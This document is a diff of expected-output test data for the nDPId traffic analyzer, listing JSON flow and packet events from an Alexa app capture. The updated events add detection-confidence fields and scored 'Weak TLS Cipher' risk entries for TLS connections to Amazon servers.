 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
-01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
-01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1490976114879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1490976114879,"pkt":"AMDKkaPvePiC0\/vCCABFAABBWl1AAEARM1WsECrYrBAqAVG6ADUALQ0pp4sBAAABAAAAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAQ=="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1490976114880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1490976114880,"pkt":"ePiC0\/vCAMDKkaPvCABFAABR3zxAAEARrmWsECoBrBAq2AA1UboAPYqqp4uBgAABAAEAAAAACHBpdGFuZ3VpBmFtYXpvbgNjb20AAAEAAcAMAAEAAQAAAAoABDRe6IY="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1857,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1490976114880,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"pitangui.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114885,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976114885,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1858,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1490976114885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976114885,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8u1JAAEAGi5ysECrYNF7ohrKgAbstn9BiAAAAAKAC\/\/81rgAAAgQFtAQCCAoA9mswAAAAAAEDAwg="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1859,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114894,"flow_last_seen":1490976114894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976114894,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -624,54 +624,54 @@
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
